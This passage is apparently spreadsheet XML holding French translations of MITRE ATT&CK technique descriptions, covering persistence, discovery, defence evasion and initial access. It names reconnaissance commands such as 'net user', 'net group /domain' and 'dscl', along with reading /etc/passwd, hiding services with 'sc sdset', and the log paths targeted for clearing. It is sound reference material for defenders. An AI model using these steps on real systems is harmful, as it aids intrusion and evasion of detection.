    <t>Les adversaires peuvent ajouter de nouvelles approbations de domaine, modifier les propriétés des approbations de domaine existantes ou modifier la configuration des relations d’approbation entre les domaines et les locataires pour contourner les défenses et/ou élever les privilèges. Les détails de confiance, tels que le fait que les identités des utilisateurs sont fédérées ou non, permettent aux propriétés d’authentification et d’autorisation de s’appliquer entre les domaines ou les locataires dans le but d’accéder aux ressources partagées. (Citation : Microsoft - Fédération Azure AD) Ces objets d’approbation peuvent inclure des comptes, des informations d’identification et d’autres éléments d’authentification appliqués à des serveurs, des jetons et des domaines.
La manipulation de ces approbations peut permettre à un adversaire d’augmenter ses privilèges et/ou d’échapper aux défenses en modifiant les paramètres pour ajouter des objets qu’il contrôle. Par exemple, dans les environnements Microsoft Active Directory (AD), cela peut être utilisé pour falsifier des [jetons SAML](https://attack.mitre.org/techniques/T1606/002) sans qu’il soit nécessaire de compromettre le certificat de signature pour falsifier de nouvelles informations d’identification. Au lieu de cela, un adversaire peut manipuler les approbations de domaine pour ajouter son propre certificat de signature. Un adversaire peut également convertir un domaine AD en domaine fédéré à l’aide des services de fédération Active Directory (AD FS), ce qui peut permettre des modifications malveillantes de l’approbation, telles que la modification des règles d’émission de revendications pour se connecter à n’importe quel ensemble valide d’informations d’identification en tant qu’utilisateur spécifié. (Citation : AADInternals zure AD Federated Domain) 
Un adversaire peut également ajouter un nouveau fournisseur d’identité fédérée à un locataire d’identité tel qu’Okta ou AWS IAM Identity Center, ce qui peut lui permettre de s’authentifier en tant qu’utilisateur du locataire. (Référence : Okta Cross-Tenant Impersonation 2023) Cela peut permettre à l’acteur malveillant d’obtenir un large accès à une variété de services basés sur le cloud qui exploitent le locataire d’identité. Par exemple, dans les environnements AWS, un adversaire qui crée un nouveau fournisseur d’identité pour une organisation AWS pourra fédérer tous les comptes membres de l’organisation AWS sans créer d’identités pour chacun des comptes membres. (Référence : AWS RE :Inforce Threat Detection 2024)
https://attack.mitre.org/techniques/T1484/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser un algorithme de chiffrement symétrique connu pour dissimuler le trafic de commande et de contrôle plutôt que de s’appuyer sur les protections inhérentes fournies par un protocole de communication. Les algorithmes de chiffrement symétrique utilisent la même clé pour le chiffrement en clair et le déchiffrement en texte chiffré. Les algorithmes de chiffrement symétrique courants incluent AES, DES, 3DES, Blowfish et RC4.
https://attack.mitre.org/techniques/T1573/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’obtenir une liste de comptes système locaux. Ces informations peuvent aider les adversaires à déterminer quels comptes locaux existent sur un système pour faciliter le comportement de suivi.
Des commandes telles que &lt;code&gt;net user&lt;/code&gt; et &lt;code&gt;net localgroup&lt;/code&gt; de l’utilitaire [Net](https://attack.mitre.org/software/S0039) et &lt;code&gt;id&lt;/code&gt; and &lt;code&gt;groups&lt;/code&gt; sous macOS et Linux peuvent répertorier les utilisateurs et les groupes locaux. (Référence : Mandiant APT1)(Citation : id man page)(Citation : page de manuel du groupe) Sous Linux, les utilisateurs locaux peuvent également être énumérés à l’aide du fichier &lt;code&gt;/etc/passwd&lt;/code&gt;. Sur macOS, la commande &lt;code&gt;dscl . list /Users&lt;/code&gt; peut être utilisée pour énumérer les comptes locaux.
https://attack.mitre.org/techniques/T1087/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent compromettre les comptes de médias sociaux qui peuvent être utilisés lors du ciblage. Pour les opérations intégrant l’ingénierie sociale, l’utilisation d’un persona en ligne peut être importante. Plutôt que de créer et de cultiver des profils de médias sociaux (c’est-à-dire des comptes de médias sociaux](https://attack.mitre.org/techniques/T1585/001)), les adversaires peuvent compromettre les comptes de médias sociaux existants. L’utilisation d’un personnage existant peut engendrer un certain niveau de confiance chez une victime potentielle si elle a une relation ou une connaissance du personnage compromis. 
Il existe diverses méthodes pour compromettre les comptes de médias sociaux, telles que la collecte d’informations d’identification via [Phishing for Information](https://attack.mitre.org/techniques/T1598), l’achat d’informations d’identification sur des sites tiers ou par force brute d’informations d’identification (par exemple, la réutilisation de mots de passe à partir de vidages d’informations d’identification de violation). (Citation : AnonHBGary) Avant de compromettre les comptes de médias sociaux, les adversaires peuvent effectuer une reconnaissance pour éclairer les décisions sur les comptes à compromettre afin de poursuivre leurs opérations.
Les personas peuvent exister sur un seul site ou sur plusieurs sites (ex : Facebook, LinkedIn, Twitter, etc.). Les comptes de médias sociaux compromis peuvent nécessiter un développement supplémentaire, notamment le remplissage ou la modification des informations de profil, le développement des réseaux sociaux ou l’intégration de photos.
Les adversaires peuvent utiliser un profil de réseau social compromis pour créer de nouvelles connexions ou détourner des connexions existantes avec des cibles d’intérêt. Ces connexions peuvent être directes ou inclure d’essayer de se connecter par l’intermédiaire d’autres personnes. (Référence : NEWSCASTER2014)(Citation : BlackHatRobinSage) Les profils compromis peuvent être exploités au cours d’autres phases du cycle de vie de l’adversaire, par exemple lors de l’accès initial (ex : [Spearphishing via le Service](https://attack.mitre.org/techniques/T1566/003)).
https://attack.mitre.org/techniques/T1586/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser du mode sans échec de Windows pour désactiver les défenses des terminaux. Le mode sans échec démarre le système d’exploitation Windows avec un ensemble limité de pilotes et de services. Les logiciels de sécurité tiers, tels que les outils de détection et de réponse aux points de terminaison (EDR), peuvent ne pas démarrer après le démarrage de Windows en mode sans échec. Il existe deux versions du mode sans échec : le mode sans échec et le mode sans échec avec mise en réseau. Il est possible de démarrer des services supplémentaires après un démarrage en mode sans échec. (Citation : Mode sans échec de Microsoft)(Citation : Sophos Snatch Ransomware 2019)
Les adversaires peuvent abuser du mode sans échec pour désactiver les défenses des terminaux qui ne peuvent pas démarrer avec un démarrage limité. Les hôtes peuvent être forcés de passer en mode sans échec après le prochain redémarrage via des modifications apportées aux magasins de données de configuration de démarrage (BCD), qui sont des fichiers qui gèrent les paramètres de l’application de démarrage. (Citation : Microsoft bcdedit 2021)
Les adversaires peuvent également ajouter leurs applications malveillantes à la liste des services minimaux qui démarrent en mode sans échec en modifiant les valeurs de registre pertinentes (c’est-à-dire [Modifier le registre](https://attack.mitre.org/techniques/T1112)). Les objets malveillants [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) peuvent également être enregistrés et chargés en mode sans échec. (Citation : Sophos Snatch Ransomware 2019)(Référence : CyberArk Labs Mode sans échec 2016)(Citation : Cybereason Nocturnus MedusaLocker 2020)(Citation : BleepingComputer REvil 2021)
https://attack.mitre.org/techniques/T1562/009</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser du netbooting pour charger un système d’exploitation de périphérique réseau non autorisé à partir d’un serveur TFTP (Trivial File Transfer Protocol). Le démarrage TFTP (netbooting) est couramment utilisé par les administrateurs réseau pour charger des images de périphériques réseau contrôlées par la configuration à partir d’un serveur de gestion centralisé. Le netbooting est une option de la séquence de démarrage et peut être utilisé pour centraliser, gérer et contrôler les images de l’appareil.
Les adversaires peuvent manipuler la configuration sur le périphérique réseau en spécifiant l’utilisation d’un serveur TFTP malveillant, qui peut être utilisé conjointement avec [Modifier l’image système](https://attack.mitre.org/techniques/T1601) pour charger une image modifiée au démarrage ou à la réinitialisation du périphérique. L’image non autorisée permet aux adversaires de modifier la configuration de l’appareil, d’ajouter des fonctionnalités malveillantes à l’appareil et d’introduire des portes dérobées pour garder le contrôle de l’appareil réseau tout en minimisant la détection grâce à l’utilisation d’une fonctionnalité standard. Cette technique est similaire à celle de [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) et peut entraîner l’exécution d’une image modifiée par le périphérique réseau. (Citation : Blog Cisco Legacy Device Attacks)
https://attack.mitre.org/techniques/T1542/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer ou modifier des services Windows pour exécuter à plusieurs reprises des charges utiles malveillantes dans le cadre de la persistance. Lorsque Windows démarre, il démarre des programmes ou des applications appelés services qui exécutent des fonctions système en arrière-plan. (Citation : TechNet Services) Les informations de configuration du service Windows, y compris le chemin d’accès au fichier exécutable ou aux programmes/commandes de récupération du service, sont stockées dans le registre Windows.
Les adversaires peuvent installer un nouveau service ou modifier un service existant pour qu’il s’exécute au démarrage afin de persister sur un système. Les configurations de service peuvent être définies ou modifiées à l’aide d’utilitaires système (tels que sc.exe), en modifiant directement le registre ou en interagissant directement avec l’API Windows. 
Les adversaires peuvent également utiliser des services pour installer et exécuter des pilotes malveillants. Par exemple, après avoir déposé un fichier de pilote (ex : '.sys') sur le disque, la charge utile peut être chargée et enregistrée via des fonctions [API native](https://attack.mitre.org/techniques/T1106) telles que 'CreateServiceW()' (ou manuellement via des fonctions telles que 'ZwLoadDriver()' et 'ZwSetValueKey()'), en créant les valeurs de registre de service requises (c’est-à-dire [Modifier le registre](https://attack.mitre.org/techniques/T1112)), ou en utilisant des utilitaires de ligne de commande tels que 'PnPUtil.exe'. (Référence : Symantec W.32 Stuxnet Dossier)(Citation : Crowdstrike DriveSlayer février 2022)(Citation : Unit42 AcidBox, juin 2020) Les adversaires peuvent exploiter ces pilotes en tant que [Rootkit](https://attack.mitre.org/techniques/T1014) pour masquer la présence d’une activité malveillante sur un système. Les adversaires peuvent également charger un pilote signé mais vulnérable sur une machine compromise (connu sous le nom de « Bring Your Own Vulnerable Driver » (BYOVD)) dans le cadre de l'[Exploitation pour l’élévation de privilèges](https://attack.mitre.org/techniques/T1068). (Citation : ESET InvisiMole, juin 2020)(Citation : Unit42 AcidBox, juin 2020)
Les services peuvent être créés avec des privilèges d’administrateur, mais sont exécutés sous des privilèges SYSTEM, de sorte qu’un adversaire peut également utiliser un service pour élever les privilèges. Les adversaires peuvent également démarrer directement des services via [Service Execution](https://attack.mitre.org/techniques/T1569/002).
Pour rendre l’analyse de détection plus difficile, les services malveillants peuvent également intégrer [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (par exemple, l’utilisation d’un service et/ou d’un nom de charge utile lié à un système d’exploitation légitime ou à un composant logiciel inoffensif). Les adversaires peuvent également créer des services « cachés » (c’est-à-dire [Hide Artifacts](https://attack.mitre.org/techniques/T1564)), par exemple en utilisant la commande 'sc sdset' pour définir les autorisations de service via le langage SDDL (Service Descriptor Definition Language). Cela peut masquer un service Windows de la vue des méthodes d’énumération de service standard telles que « Get-Service », « sc query » et « services.exe ». (Citation : SANS 1)(Référence : SANS 2)
https://attack.mitre.org/techniques/T1543/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser le DNS Fast Flux pour masquer un canal de commande et de contrôle derrière un tableau d’adresses IP changeant rapidement et lié à une résolution de domaine unique. Cette technique utilise un nom de domaine complet, avec plusieurs adresses IP qui lui sont attribuées qui sont échangées à haute fréquence, en utilisant une combinaison d’adressage IP à tour de rôle et de courte durée de vie (TTL) pour un enregistrement de ressource DNS. (Citation : MehtaFastFluxPt1)(Citation : MehtaFastFluxPt2)(Citation : Fast Flux - Welivesecurity)
La méthode la plus simple, « à flux unique », consiste à enregistrer et à désinscrire une adresse dans le cadre de la liste d’enregistrements DNS A (adresse) pour un seul nom DNS. Ces enregistrements ont une durée de vie moyenne de cinq minutes, ce qui entraîne un mélange constant de la résolution des adresses IP. (Citation : Fast Flux - Welivesecurity)
En revanche, la méthode « double-flux » enregistre et désenregistre une adresse dans le cadre de la liste d’enregistrements du serveur de noms DNS pour la zone DNS, ce qui offre une résilience supplémentaire à la connexion. Avec le double flux, des hôtes supplémentaires peuvent agir comme un proxy à l’hôte C2, isolant ainsi davantage la véritable source du canal C2.
https://attack.mitre.org/techniques/T1568/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser diverses vérifications du système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vérifications spécifiques varient en fonction de la cible et/ou de l’adversaire, mais peuvent impliquer des comportements tels que [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [Découverte des informations système](https://attack.mitre.org/techniques/T1082) et [Registre des requêtes](https://attack.mitre.org/techniques/T1012) pour obtenir des informations système et rechercher des artefacts VME. Les adversaires peuvent rechercher des artefacts VME dans la mémoire, les processus, le système de fichiers, le matériel et/ou le registre. Les adversaires peuvent utiliser des scripts pour automatiser ces vérifications en un seul script, puis faire en sorte que le programme se termine s’il détermine que le système est un environnement virtuel. 
Les vérifications peuvent inclure des propriétés système génériques telles que le nom d’hôte/domaine et des échantillons de trafic réseau. Les adversaires peuvent également vérifier les adresses des cartes réseau, le nombre de cœurs du processeur et la taille de la mémoire ou du lecteur disponible. Une fois exécutés, les logiciels malveillants peuvent également utiliser [Découverte de fichiers et de répertoires](https://attack.mitre.org/techniques/T1083) pour vérifier s’ils ont été enregistrés dans un dossier ou un fichier contenant des artefacts de dénomination inattendus ou même liés à l’analyse, tels que « malware », « sample » ou « hash ».
D’autres vérifications courantes peuvent énumérer les services en cours d’exécution qui sont uniques à ces applications, les programmes installés sur le système, les champs fabricant/produit pour les chaînes relatives aux applications de machine virtuelle et les instructions matérielles/processeurs spécifiques à VME. (Référence : McAfee Virtual janvier 2017) Dans des applications telles que VMWare, les adversaires peuvent également utiliser un port d’E/S spécial pour envoyer des commandes et recevoir des sorties. 
Les vérifications matérielles, telles que la présence du ventilateur, la température et les appareils audio, peuvent également être utilisées pour recueillir des preuves qui peuvent indiquer un environnement virtuel. Les adversaires peuvent également demander des lectures spécifiques à partir de ces appareils. (Référence : Unit 42 OilRig septembre 2018)
https://attack.mitre.org/techniques/T1497/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de l’utilitaire &lt;code&gt;cron&lt;/code&gt; pour effectuer la planification de tâches pour l’exécution initiale ou récurrente de code malveillant. (Citation : 20 outils et techniques courants macOS) &lt;code&gt;L’utilitaire cron&lt;/code&gt; est un planificateur de tâches basé sur le temps pour les systèmes d’exploitation de type Unix.  Le fichier &lt;code&gt; crontab&lt;/code&gt; contient le calendrier des entrées cron à exécuter et les heures d’exécution spécifiées. Tous les fichiers &lt;code&gt;crontab&lt;/code&gt; sont stockés dans des chemins d’accès spécifiques au système d’exploitation.
Un adversaire peut utiliser &lt;code&gt;cron&lt;/code&gt; dans des environnements Linux ou Unix pour exécuter des programmes au démarrage du système ou de manière planifiée pour la [Persistance](https://attack.mitre.org/tactics/TA0003).
https://attack.mitre.org/techniques/T1053/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de trouver des groupes au niveau du domaine et des paramètres d’autorisation. La connaissance des groupes d’autorisations au niveau du domaine peut aider les adversaires à déterminer quels groupes existent et quels utilisateurs appartiennent à un groupe particulier. Les adversaires peuvent utiliser ces informations pour déterminer quels utilisateurs disposent d’autorisations élevées, tels que les administrateurs de domaine.
Des commandes telles que &lt;code&gt;net group /domain&lt;/code&gt; de l’utilitaire [Net](https://attack.mitre.org/software/S0039), &lt;code&gt;dscacheutil -q group&lt;/code&gt; sous macOS et &lt;code&gt;ldapsearch&lt;/code&gt; sous Linux peuvent répertorier les groupes de niveau domaine.
https://attack.mitre.org/techniques/T1069/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent obtenir des informations sur les vulnérabilités qui peuvent être utilisées lors du ciblage. Une vulnérabilité est une faiblesse dans le matériel ou les logiciels d’un ordinateur qui peut, potentiellement, être exploitée par un adversaire pour provoquer un comportement involontaire ou imprévu. Les adversaires peuvent trouver des informations sur les vulnérabilités en effectuant des recherches dans des bases de données ouvertes ou en accédant à des bases de données de vulnérabilités fermées. (Citation : Base de données nationale sur les vulnérabilités)
Un adversaire peut surveiller les divulgations de vulnérabilités/bases de données pour comprendre l’état des vulnérabilités existantes et nouvellement découvertes. Il y a généralement un délai entre le moment où une vulnérabilité est découverte et celui où elle est rendue publique. Un adversaire peut cibler les systèmes de ceux qui sont connus pour mener des recherches de vulnérabilité (y compris les fournisseurs commerciaux). La connaissance d’une vulnérabilité peut amener un adversaire à rechercher un exploit existant (c’est-à-dire [Exploits](https://attack.mitre.org/techniques/T1588/005)) ou à tenter d’en développer un lui-même (https://attack.mitre.org/techniques/T1587/004).
https://attack.mitre.org/techniques/T1588/006</t>
  </si>
  <si>
    <t>Les adversaires peuvent effacer les journaux du système pour masquer les preuves d’une intrusion. macOS et Linux gardent tous deux une trace des actions du système ou de l’utilisateur via les journaux système. La majorité de la journalisation native du système est stockée dans le répertoire &lt;code&gt;/var/log/&lt;/code&gt;. Les sous-dossiers de ce répertoire classent les journaux en fonction de leurs fonctions associées, telles que :(Citation : Linux Logs)
* &lt;code&gt;/var/log/messages :&lt;/code&gt;: Messages généraux et liés au système
* &lt;code&gt;/var/log/secure&lt;/code&gt; ou &lt;code&gt;/var/log/auth.log&lt;/code&gt; : journaux d’authentification
* &lt;code&gt;/var/log/utmp&lt;/code&gt; ou &lt;code&gt;/var/log/wtmp&lt;/code&gt; : enregistrements de connexion
* &lt;code&gt;/var/log/kern.log&lt;/code&gt; : Journaux du noyau
* &lt;code&gt;/var/log/cron.log&lt;/code&gt; : Journaux de Crond
* &lt;code&gt;/var/log/maillog&lt;/code&gt; : journaux du serveur de messagerie
* &lt;code&gt;/var/log/httpd/&lt;/code&gt; : Accès au serveur Web et journaux d’erreurs
https://attack.mitre.org/techniques/T1070/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent exploiter des vulnérabilités logicielles qui peuvent provoquer le blocage d’une application ou d’un système et empêcher les utilisateurs d’en avoir la disponibilité. (Citation : Sucuri BIND9 août 2015) Certains systèmes peuvent redémarrer automatiquement des applications et des services critiques en cas de panne, mais ils peuvent probablement être réexploités pour provoquer une condition de déni de service persistant (DoS).
Les adversaires peuvent exploiter des vulnérabilités connues ou zero-day pour faire planter des applications et/ou des systèmes, ce qui peut également conduire à ce que des applications et/ou des systèmes dépendants soient dans une condition de déni de service. Les applications ou systèmes bloqués ou redémarrés peuvent également avoir d’autres effets tels que [Destruction de données](https://attack.mitre.org/techniques/T1485), [Corruption du micrologiciel](https://attack.mitre.org/techniques/T1495), [Arrêt de service](https://attack.mitre.org/techniques/T1489), etc., qui peuvent provoquer une condition de déni de service et empêcher la disponibilité d’informations, d’applications et/ou de systèmes critiques.
https://attack.mitre.org/techniques/T1499/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent exploiter les applications basées sur Microsoft Office pour la persistance entre les startups. Microsoft Office est une suite d’applications assez courante sur les systèmes d’exploitation Windows au sein d’un réseau d’entreprise. Il existe plusieurs mécanismes qui peuvent être utilisés avec Office pour la persistance lorsqu’une application basée sur Office est démarrée ; cela peut inclure l’utilisation de macros et de compléments de modèle Office.
Diverses fonctionnalités ont été découvertes dans Outlook qui peuvent être utilisées de manière abusive pour obtenir la persistance, telles que les règles Outlook, les formulaires et la page d’accueil. (Citation : SensePost Ruler GitHub) Ces mécanismes de persistance peuvent fonctionner dans Outlook ou être utilisés via Office 365. (Citation : Règles TechNet O365 Outlook)
https://attack.mitre.org/techniques/T1137</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser InstallUtil pour exécuter du code par proxy via un utilitaire Windows approuvé. InstallUtil est un utilitaire de ligne de commande qui permet d’installer et de désinstaller des ressources en exécutant des composants d’installation spécifiques spécifiés dans les fichiers binaires .NET. (Citation : MSDN InstallUtil) Le fichier binaire InstallUtil peut également être signé numériquement par Microsoft et situé dans les répertoires .NET d’un système Windows : &lt;code&gt;C :\Windows\Microsoft.NET\Framework\v&lt;version&gt;\InstallUtil.exe&lt;/code&gt; et &lt;code&gt;C :\Windows\Microsoft.NET\Framework64\v&lt;version&gt;\InstallUtil.exe&lt;/code&gt;.
InstallUtil peut également être utilisé pour contourner le contrôle de l’application en utilisant des attributs dans le binaire qui exécutent la classe décorée avec l’attribut &lt;code&gt;[System.ComponentModel.RunInstaller(true)]&lt;/code&gt;. (Citation : LOLBAS Installutil)
https://attack.mitre.org/techniques/T1218/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser [Comptes valides](https://attack.mitre.org/techniques/T1078) pour se connecter à des machines distantes à l’aide de Secure Shell (SSH). L’adversaire peut alors effectuer des actions en tant qu’utilisateur connecté.
SSH est un protocole qui permet aux utilisateurs autorisés d’ouvrir des shells distants sur d’autres ordinateurs. De nombreuses versions de Linux et macOS sont livrées avec SSH installé par défaut, bien qu’il soit généralement désactivé jusqu’à ce que l’utilisateur l’active. Le serveur SSH peut être configuré pour utiliser l’authentification par mot de passe standard ou des paires de clés public-privé à la place ou en plus d’un mot de passe. Dans ce scénario d’authentification, la clé publique de l’utilisateur doit se trouver dans un fichier spécial sur l’ordinateur exécutant le serveur qui répertorie les paires de clés autorisées à se connecter en tant qu’utilisateur.
https://attack.mitre.org/techniques/T1021/004</t>
  </si>
  <si>
    <t>Un adversaire peut ajouter des rôles ou des autorisations supplémentaires à un compte cloud contrôlé par l’adversaire pour maintenir un accès persistant à un locataire. Par exemple, les adversaires peuvent mettre à jour les stratégies IAM dans les environnements basés sur le cloud ou ajouter un nouvel administrateur général dans les environnements Office 365. (Référence : Politiques et autorisations AWS IAM)(Citation : Politiques IAM de Google Cloud)(Citation : Microsoft Support O365 Ajouter un autre administrateur, octobre 2019)(Citation : Rôles d’administrateur Microsoft O365) Avec des autorisations suffisantes, un compte compromis peut obtenir un accès presque illimité aux données et aux paramètres (y compris la possibilité de réinitialiser les mots de passe d’autres administrateurs). (Citation : Expulser l’attaquant AWS)
(Citation : Rôles d’administrateur Microsoft O365) 
Cette modification de compte peut immédiatement suivre [Créer un compte](https://attack.mitre.org/techniques/T1136) ou toute autre activité malveillante du compte. Les adversaires peuvent également modifier les [Comptes valides](https://attack.mitre.org/techniques/T1078) existants qu’ils ont compromis. Cela peut entraîner une élévation de privilèges, en particulier si les rôles ajoutés permettent un mouvement latéral vers des comptes supplémentaires.
Par exemple, dans les environnements AWS, un adversaire disposant des autorisations appropriées peut être en mesure d’utiliser l’API &lt;code&gt;CreatePolicyVersion&lt;/code&gt; pour définir une nouvelle version d’une stratégie IAM ou l’API &lt;code&gt;AttachUserPolicy&lt;/code&gt; pour attacher une stratégie IAM avec des autorisations supplémentaires ou distinctes à un compte d’utilisateur compromis. (Citation : Rhino Security Labs AWS Privilege Escalation)
Dans certains cas, les adversaires peuvent ajouter des rôles à des comptes contrôlés par des adversaires en dehors du locataire cloud victime. Cela permet à ces comptes externes d’effectuer des actions à l’intérieur du locataire victime sans que l’adversaire ait à [Créer un compte](https://attack.mitre.org/techniques/T1136) ou à modifier un compte appartenant à la victime. (Citation : Invictus IR DangerDev 2024)
https://attack.mitre.org/techniques/T1098/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des processeurs d’impression pour exécuter des DLL malveillantes lors du démarrage du système à des fins de persistance et/ou d’élévation de privilèges. Les processeurs d’impression sont des DLL chargées par le service de spouleur d’impression, « spoolsv.exe », pendant le démarrage. (Citation : Microsoft Intro Print Processors)
Les adversaires peuvent abuser du service de spouleur d’impression en ajoutant des processeurs d’impression qui chargent des DLL malveillantes au démarrage. Un processeur d’impression peut être installé via l’appel d’API &lt;code&gt;AddPrintProcessor&lt;/code&gt; avec un compte pour lequel &lt;code&gt;SeLoadDriverPrivilege&lt;/code&gt; est activé. Il est également possible d’enregistrer un processeur d’impression auprès du service de spouleur d’impression en ajoutant la clé &lt;code&gt;de registre HKLM\SYSTEM\\[CurrentControlSet ou ControlSet001]\Control\Print\Environments\\[Architecture Windows : par exemple, Windows x64]\Print Processors\\[défini par l’utilisateur]\Driver&lt;/code&gt; Registry qui pointe vers la DLL.
Pour que le processeur d’impression malveillant soit correctement installé, la charge utile doit se trouver dans le répertoire dédié du processeur d’impression du système, qui se trouve avec l’appel d’API &lt;code&gt;GetPrintProcessorDirectory&lt;/code&gt; ou qui est référencé via un chemin d’accès relatif de ce répertoire. (Citation : Microsoft AddPrintProcessor mai 2018) Une fois les processeurs d’impression installés, le service de spouleur d’impression, qui démarre pendant le démarrage, doit être redémarré pour qu’ils puissent s’exécuter. (Citation : ESET PipeMon mai 2020)
Le service de spouleur d’impression s’exécute avec des autorisations de niveau SYSTÈME, par conséquent, les processeurs d’impression installés par un adversaire peuvent s’exécuter avec des privilèges élevés.
https://attack.mitre.org/techniques/T1547/012</t>
  </si>
  <si>
    <t>Les adversaires peuvent envoyer des e-mails de spearphishing avec une pièce jointe malveillante pour tenter d’accéder aux systèmes des victimes. L’accessoire de spearphishing est une variante spécifique du spearphishing. La pièce jointe de spearphishing est différente des autres formes de spearphishing en ce sens qu’elle utilise l’utilisation de logiciels malveillants joints à un e-mail. Toutes les formes de spearphishing sont des actions d’ingénierie sociale transmises par voie électronique et ciblent une personne, une entreprise ou un secteur d’activité spécifique. Dans ce scénario, les adversaires joignent un fichier à l’e-mail de spearphishing et s’appuient généralement sur [Exécution par l’utilisateur](https://attack.mitre.org/techniques/T1204) pour obtenir l’exécution. (Citation : Unité 42 DarkHydrus juillet 2018) Le spearphishing peut également impliquer des techniques d’ingénierie sociale, comme se faire passer pour une source fiable.
Il existe de nombreuses options pour la pièce jointe, telles que les documents Microsoft Office, les exécutables, les PDF ou les fichiers archivés. Lors de l’ouverture de la pièce jointe (et éventuellement en cliquant sur les protections précédentes), la charge utile de l’adversaire exploite une vulnérabilité ou s’exécute directement sur le système de l’utilisateur. Le texte de l’e-mail de spearphishing tente généralement de donner une raison plausible pour laquelle le fichier devrait être ouvert, et peut expliquer comment contourner les protections du système pour ce faire. L’e-mail peut également contenir des instructions sur la façon de déchiffrer une pièce jointe, comme le mot de passe d’un fichier zip, afin d’échapper aux défenses des limites de l’e-mail. Les adversaires manipulent fréquemment les extensions de fichiers et les icônes afin de faire passer les exécutables joints pour des fichiers de document, ou pour que les fichiers exploitant une application apparaissent comme un fichier pour une autre.
https://attack.mitre.org/techniques/T1566/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de rendre une charge utile difficile à analyser en supprimant des symboles, des chaînes et d’autres informations lisibles par l’homme. Les scripts et les exécutables peuvent contenir des noms de variables et d’autres chaînes qui aident les développeurs à documenter les fonctionnalités du code. Les symboles sont souvent créés par l’éditeur de liens d’un système d’exploitation lors de la compilation des charges utiles exécutables. L’ingénierie inverse utilise ces symboles et chaînes pour analyser le code et identifier les fonctionnalités des charges utiles. (Citation : Explication des binaires dépouillés de Mandiant golang)(Citation : intezer stripped binaries elf files 2018)
Les adversaires peuvent utiliser des charges utiles supprimées afin de rendre l’analyse des logiciels malveillants plus difficile. Par exemple, les compilateurs et autres outils peuvent fournir des fonctionnalités permettant de supprimer ou d’obscurcir des chaînes et des symboles. Les adversaires ont également utilisé des formats de charge utile dépouillés, tels que les AppleScripts en exécution seule, une version compilée et dépouillée de [AppleScript](https://attack.mitre.org/techniques/T1059/002), pour échapper à la détection et à l’analyse. Le manque d’informations lisibles par l’homme peut entraver directement la détection et l’analyse des charges utiles. (Citation : SentinelLabs inversant les applescripts en run-only 2021)
https://attack.mitre.org/techniques/T1027/008</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser le modèle COM (Windows Component Object Model) pour l’exécution de code local. COM est un composant de communication inter-processus (IPC) de l’interface de programmation d’application (API) native de Windows qui permet l’interaction entre des objets logiciels, ou du code exécutable qui implémente une ou plusieurs interfaces. (Référence : Fireeye Hunting COM juin 2019) Par COM, un objet client peut appeler des méthodes d’objets serveur, qui sont généralement des bibliothèques de liens dynamiques (DLL) binaires ou des exécutables (EXE). (Citation : Microsoft COM) L’exécution de COM à distance est facilitée par des [Services à distance](https://attack.mitre.org/techniques/T1021) tels que [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM). (Référence : Fireeye Hunting COM juin 2019)
Diverses interfaces COM sont exposées et peuvent être utilisées de manière abusive pour invoquer une exécution arbitraire via divers langages de programmation tels que C, C++, Java et [Visual Basic](https://attack.mitre.org/techniques/T1059/005). (Citation : Microsoft COM) Des objets COM spécifiques existent également pour exécuter directement des fonctions au-delà de l’exécution de code, telles que la création d’une [tâche/tâche planifiée](https://attack.mitre.org/techniques/T1053), le téléchargement/l’exécution sans fichier et d’autres comportements de l’adversaire liés à l’élévation de privilèges et à la persistance. (Référence : Fireeye Hunting COM juin 2019)(Citation : ProjectZero File Write EoP Apr 2018)
https://attack.mitre.org/techniques/T1559/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent exécuter leurs propres charges utiles malveillantes en détournant l’ordre de recherche utilisé pour charger les DLL. Les systèmes Windows utilisent une méthode courante pour rechercher les DLL requises à charger dans un programme. (Citation : Ordre de recherche de la bibliothèque de liens dynamiques Microsoft)(Citation : Détournement de FireEye juillet 2010) Le détournement de charges DLL peut avoir pour but d’établir la persistance, d’élever les privilèges et/ou d’éluder les restrictions sur l’exécution des fichiers.
Il existe de nombreuses façons pour un adversaire de détourner des charges DLL. Les adversaires peuvent installer des fichiers de bibliothèque de liens dynamiques (DLL) de cheval de Troie dans un répertoire qui sera recherché avant l’emplacement d’une bibliothèque légitime qui sera demandée par un programme, ce qui oblige Windows à charger leur bibliothèque malveillante lorsqu’elle est demandée par le programme victime. Les adversaires peuvent également effectuer le préchargement de DLL, également appelé attaques d’implantation binaire, (Citation : OWASP Binary Planting) en plaçant une DLL malveillante portant le même nom qu’une DLL spécifiée de manière ambiguë dans un emplacement que Windows recherche avant la DLL légitime. Souvent, cet emplacement est le répertoire de travail actuel du programme. (Citation : FireEye fxsst juin 2011) Les attaques de préchargement de DLL distantes se produisent lorsqu’un programme définit son répertoire actuel sur un emplacement distant, tel qu’un partage Web, avant de charger une DLL. (Référence : Avis de sécurité Microsoft 2269637)
Le détournement de DLL fantôme est un type spécifique de détournement d’ordre de recherche DLL où les adversaires ciblent des références à des fichiers DLL inexistants. (Citation : Détournement de DLL Hexacorn)(Citation : Les adversaires détournent les DLL) Ils peuvent être en mesure de charger leur propre DLL malveillante en l’implantant avec le nom correct à l’emplacement du module manquant.
